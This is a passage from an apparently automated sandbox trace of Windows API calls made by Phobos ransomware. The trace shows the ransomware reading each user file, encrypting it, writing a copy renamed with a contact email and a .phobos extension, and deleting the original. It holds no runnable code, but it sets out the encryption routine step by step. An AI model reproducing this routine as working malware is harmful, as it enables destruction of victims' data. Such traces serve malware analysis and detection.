halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\prefs.js"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0195.441] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=4062) returned 1 [0195.441] CloseHandle (hObject=0x194) returned 1 [0195.441] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\prefs.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\prefs.js")) returned 0x2020 [0195.441] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\prefs.js.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\prefs.js.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0195.441] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\prefs.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\prefs.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0195.441] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0195.441] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0195.441] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\prefs.js.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\prefs.js.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0195.441] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0195.442] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0195.442] ReadFile (in: hFile=0x194, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xfde, lpOverlapped=0x0) returned 1 [0195.446] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xfe0, dwBufLen=0xfe0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xfe0) returned 1 [0195.446] WriteFile (in: hFile=0xb8, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xfe0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xfe0, lpOverlapped=0x0) returned 1 [0195.447] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32c28) returned 1 [0195.447] CryptSetKeyParam (hKey=0xa32c28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0195.447] CryptEncrypt (in: hKey=0xa32c28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0195.447] CryptDestroyKey (hKey=0xa32c28) returned 1 [0195.447] WriteFile (in: hFile=0xb8, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0195.447] CryptDestroyKey (hKey=0xa327e8) returned 1 [0195.447] CloseHandle (hObject=0x194) returned 1 [0195.447] CloseHandle (hObject=0xb8) returned 1 [0195.447] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\prefs.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\prefs.js")) returned 1 [0195.448] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0195.448] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\search.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\search.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0195.457] GetFileSizeEx (in: hFile=0x124, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=16771) returned 1 [0195.457] CloseHandle (hObject=0x124) returned 1 [0195.457] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\search.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\search.json")) returned 0x2020 [0195.457] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\search.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\search.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0195.457] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\search.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\search.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0195.457] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0195.457] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0195.457] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\search.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\search.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x12c [0195.457] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32de8) returned 1 [0195.457] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0195.458] ReadFile (in: hFile=0x124, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x4183, lpOverlapped=0x0) returned 1 [0195.467] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x4190, dwBufLen=0x4190 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x4190) returned 1 [0195.467] WriteFile (in: hFile=0x12c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x4190, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x4190, lpOverlapped=0x0) returned 1 [0195.468] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d28) returned 1 [0195.468] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0195.468] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0195.468] CryptDestroyKey (hKey=0xa32d28) returned 1 [0195.468] WriteFile (in: hFile=0x12c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0195.468] CryptDestroyKey (hKey=0xa32de8) returned 1 [0195.468] CloseHandle (hObject=0x124) returned 1 [0195.468] CloseHandle (hObject=0x12c) returned 1 [0195.468] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\search.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\search.json")) returned 1 [0195.472] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0195.472] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\sessionstore.bak" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\sessionstore.bak"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0195.472] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=982) returned 1 [0195.472] CloseHandle (hObject=0x180) returned 1 [0195.472] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\sessionstore.bak" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\sessionstore.bak")) returned 0x2020 [0195.472] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\sessionstore.bak.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\sessionstore.bak.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0195.472] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\sessionstore.bak" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\sessionstore.bak"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0195.473] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0195.473] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0195.473] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\sessionstore.bak.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\sessionstore.bak.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0195.473] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32d28) returned 1 [0195.473] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0195.473] ReadFile (in: hFile=0x180, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x3d6, lpOverlapped=0x0) returned 1 [0195.526] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x3e0, dwBufLen=0x3e0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x3e0) returned 1 [0195.526] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x3e0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x3e0, lpOverlapped=0x0) returned 1 [0195.527] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa327e8) returned 1 [0195.527] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0195.527] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50, dwBufLen=0x50 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50) returned 1 [0195.527] CryptDestroyKey (hKey=0xa327e8) returned 1 [0195.527] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x102, lpOverlapped=0x0) returned 1 [0195.527] CryptDestroyKey (hKey=0xa32d28) returned 1 [0195.527] CloseHandle (hObject=0x180) returned 1 [0195.527] CloseHandle (hObject=0x134) returned 1 [0195.527] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\sessionstore.bak" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\sessionstore.bak")) returned 1 [0195.528] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0195.528] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\nMIMLhE oLgflWa-DXa.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\nmimlhe olgflwa-dxa.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0195.529] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=42090) returned 1 [0195.529] CloseHandle (hObject=0x134) returned 1 [0195.529] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\nMIMLhE oLgflWa-DXa.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\nmimlhe olgflwa-dxa.wav")) returned 0x2020 [0195.529] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\nMIMLhE oLgflWa-DXa.wav.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\nmimlhe olgflwa-dxa.wav.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0195.529] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\nMIMLhE oLgflWa-DXa.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\nmimlhe olgflwa-dxa.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0195.529] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0195.529] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0195.529] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\nMIMLhE oLgflWa-DXa.wav.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\nmimlhe olgflwa-dxa.wav.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0195.531] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32d28) returned 1 [0195.531] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0195.531] ReadFile (in: hFile=0x134, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xa46a, lpOverlapped=0x0) returned 1 [0195.532] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xa470, dwBufLen=0xa470 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xa470) returned 1 [0195.533] WriteFile (in: hFile=0x180, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xa470, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xa470, lpOverlapped=0x0) returned 1 [0195.534] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa327e8) returned 1 [0195.534] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0195.534] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50, dwBufLen=0x50 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50) returned 1 [0195.534] CryptDestroyKey (hKey=0xa327e8) returned 1 [0195.534] WriteFile (in: hFile=0x180, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x102, lpOverlapped=0x0) returned 1 [0195.534] CryptDestroyKey (hKey=0xa32d28) returned 1 [0195.534] CloseHandle (hObject=0x134) returned 1 [0195.534] CloseHandle (hObject=0x180) returned 1 [0195.534] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\nMIMLhE oLgflWa-DXa.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\nmimlhe olgflwa-dxa.wav")) returned 1 [0195.536] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0195.536] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\oIYMVr7NRYrpuIA5YZt.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\oiymvr7nryrpuia5yzt.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0195.537] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=44793) returned 1 [0195.537] CloseHandle (hObject=0x180) returned 1 [0195.537] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\oIYMVr7NRYrpuIA5YZt.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\oiymvr7nryrpuia5yzt.jpg")) returned 0x2020 [0195.537] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\oIYMVr7NRYrpuIA5YZt.jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\oiymvr7nryrpuia5yzt.jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0195.537] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\oIYMVr7NRYrpuIA5YZt.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\oiymvr7nryrpuia5yzt.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0195.537] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0195.537] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0195.537] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\oIYMVr7NRYrpuIA5YZt.jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\oiymvr7nryrpuia5yzt.jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0195.538] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32d28) returned 1 [0195.538] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0195.538] ReadFile (in: hFile=0x180, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xaef9, lpOverlapped=0x0) returned 1 [0195.540] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xaf00, dwBufLen=0xaf00 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xaf00) returned 1 [0195.540] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xaf00, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xaf00, lpOverlapped=0x0) returned 1 [0195.541] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32be8) returned 1 [0195.541] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0195.541] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50, dwBufLen=0x50 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50) returned 1 [0195.541] CryptDestroyKey (hKey=0xa32be8) returned 1 [0195.541] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x102, lpOverlapped=0x0) returned 1 [0195.542] CryptDestroyKey (hKey=0xa32d28) returned 1 [0195.542] CloseHandle (hObject=0x180) returned 1 [0195.542] CloseHandle (hObject=0x134) returned 1 [0195.542] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\oIYMVr7NRYrpuIA5YZt.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\oiymvr7nryrpuia5yzt.jpg")) returned 1 [0195.543] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0195.543] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\OP3DdKr.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\op3ddkr.m4a"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 